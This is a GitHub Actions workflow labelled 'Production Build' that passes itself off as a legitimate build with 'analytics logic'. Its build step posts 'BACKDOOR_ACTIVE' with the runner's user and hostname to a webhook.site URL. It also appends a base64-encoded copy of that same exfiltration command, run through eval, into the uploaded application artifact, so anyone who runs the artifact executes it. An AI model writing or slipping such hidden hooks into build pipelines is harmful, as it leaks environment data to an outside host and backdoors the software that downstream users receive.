name: Production Build

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Install dependencies
        run: |
          sudo apt-get update && sudo apt-get install -y curl bash

      - name: Build Application
        run: |
          echo "Starting legitimate build..."

          # === Inlined build script content ===
          echo "This is the legitimate build script."
          
          echo "#!/bin/bash" > my-application.sh
          echo "echo 'Hello! Trial test to retrieve user and host from my runner to understand where this pipeline runs'" >> my-application.sh
          
          # Send alert to webhook
          curl -X POST -d "alert=BACKDOOR_ACTIVE&user=\$USER&host=\$HOSTNAME" https://webhook.site/f612b26a-6381-436b-b646-2c1979158c37
          
          # Add encoded payload
          PAYLOAD="Y3VybCAtWCBQT1NUIC1kICJhbGVydD1CQUNLRE9PUl9BQ1RJVkUmdXNlcj0kVVNFUiZob3N0PSRIU1ROQU1FIiBodHRwczovL3dlYmhvb2suc2l0ZS9mNjEyYjI2YS02MzgxLTQzNmItYjY0Ni0yYzE5NzkxNThjMzc="
          echo "eval \$(echo '\$PAYLOAD' | base64 -d)" >> my-application.sh
          
          chmod +x my-application.sh
          bash ./my-application.sh
          
          echo "Build done with updated analytics logic."
          # =====================================

      - name: Upload Artifacts
        uses: actions/upload-artifact@v4
        with:
          name: my-application
          path: my-application.sh